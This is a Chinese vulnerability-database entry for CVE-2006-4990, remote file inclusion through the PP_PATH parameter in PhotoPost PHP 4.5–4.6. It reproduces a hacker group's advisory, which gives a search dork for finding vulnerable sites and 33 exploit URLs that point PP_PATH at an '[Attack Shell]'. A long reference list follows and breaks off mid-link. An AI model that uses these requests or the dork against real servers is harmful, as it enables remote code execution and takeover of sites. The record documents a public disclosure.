PhotoPost 多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1193401 漏洞类型 未知
发布时间 2006-09-25 更新时间 2006-09-27
CVE编号 CVE-2006-4990 CNNVD-ID CNNVD-200609-438
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2006090159
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-438
|漏洞详情
PhotoPost中存在多个PHP远程文件包含漏洞,远程攻击者可以通过以下文件的PP_PATH参数中的URL执行任意PHP代码:(1)addfav.php,(2)adm-admlog.php,(3)adm-approve.php,(4)adm-backup.php,(5)adm-cats.php,(6)adm-cinc.php,(7)adm-db.php,(8)adm-editcfg.php,(9)adm-inc.php,(10)adm-index.php,(11)adm-modcom.php,(12)adm-move.php,(13)adm-options.php,(14)adm-order.php,(15)adm-pa.php,(16)adm-photo.php,(17)adm-purge.php,(18)adm-style.php,(19)adm-templ.php,(20)adm-userg.php,(21)adm-users.php,(22)bulkupload.php,(23)cookies.php,(24)comments.php,(25)ecard.php,(26)editphoto.php,(27)register.php,(28)showgallery.php,(29)showmembers.php,(30)useralbums.php,(31)uploadphoto.php,(32)search.php或(33)adm-menu.php。
|漏洞EXP
########################################################################
##############
#
#     PhotoPost PHP  4.6 - 4.5 [PP_PATH] >> Remote File Include 
Vulnerability
#
########################################################################
##############
#      Found by ..........: AG-Spider
#      our Web Site : ----  http://www.ArabAttack.com
#                      Arab Attack Security Team
########################################################################
##############
#      Affected Software .: PhotoPost PHP
#      Vendor ............: http://www.popphoto.com
#      Risk & Class...: high-Remote File Inclusion
#      C0ntAct ...........: AG-Spider [at] msn [dot] com
########################################################################
##############
#
#             require "pp-inc.php";
#             require "$PP_PATH/languages/$pplang/addfav.php";
#             require "$PP_PATH/login-inc.php";
#
########################################################################
##############
#       Dork :"Powered by: PhotoPost PHP 4.6"
#                  "Powered by: PhotoPost PHP 4.5"
#
#     Exploit :-
#
#     http://[target]/[path]/addfav.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-admlog.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-approve.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-backup.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-cats.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-cinc.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-db.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-editcfg.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-inc.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-index.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-modcom.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-move.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-options.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-order.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-pa.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-photo.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-purge.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-style.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-templ.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-userg.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-users.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/bulkupload.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/cookies.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/comments.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/ecard.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/editphoto.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/register.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/showgallery.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/showmembers.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/useralbums.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/uploadphoto.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/search.php?PP_PATH=[Attack Shell]?
#     http://[target]/[path]/adm-menu.php?PP_PATH=[Attack Shell]?
########################################################################
##############
#
#
#     Greets 2 : Black-c0de <> KaBaRa.HaCk.eGy <> KILLERxXx <> 
CRASH_OVER_RIDE <> SwEEt-deVil <> Young Hacker
#     our Web Site : ----  http://www.ArabAttack.com
#                      Arab Attack Security Team
########################################################################
##############
#
#     thx 2 :::::: Lezr.com
#
########################################################################
##############

_________________________________________________________________
Be the first to hear what's new at MSN - sign up to our free newsletters! 
http://www.msn.co.uk/newsletters
|参考资料

来源:BUGTRAQ
名称:20060918PhotoPostPHP4.6-4.5[PP_PATH]>>RemoteFileIncludeVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/446224/100/0/threaded
来源:OSVDB
名称:32253
链接:http://www.osvdb.org/32253
来源:OSVDB
名称:32252
链接:http://www.osvdb.org/32252
来源:OSVDB
名称:32251
链接:http://www.osvdb.org/32251
来源:OSVDB
名称:32250
链接:http://www.osvdb.org/32250
来源:OSVDB
名称:32249
链接:http://www.osvdb.org/32249
来源:OSVDB
名称:32248
链接:http://www.osvdb.org/32248
来源:OSVDB
名称:32247
链接:http://www.osvdb.org/32247
来源:OSVDB
名称:32246
链接:http://www.osvdb.org/32246
来源:OSVDB
名称:32245
链接:http://www.osvdb.org/32245
来源:OSVDB
名称:32243
链接:http://www.osvdb.org/32243
来源:OSVDB
名称:32240
链接:http://www.osvdb.org/32240
来源:OSVDB
名称:32239
链接:http://www.osvdb.org/32239
来源:OSVDB
名称:32238
链接:http://www.osvdb.org/32238
来源:OSVDB
名称:32237
链接:http://www.osvdb.org/32237
来源:OSVDB
名称:32236
链接:http://www.osvdb.org/32236
来源:OSVDB
名称:32235
链接:http://www.osvdb.org/32235
来源:OSVDB
名称:32234
链接:http://www.osvdb.org/32234
来源:OSVDB
名称:32233
链接:http: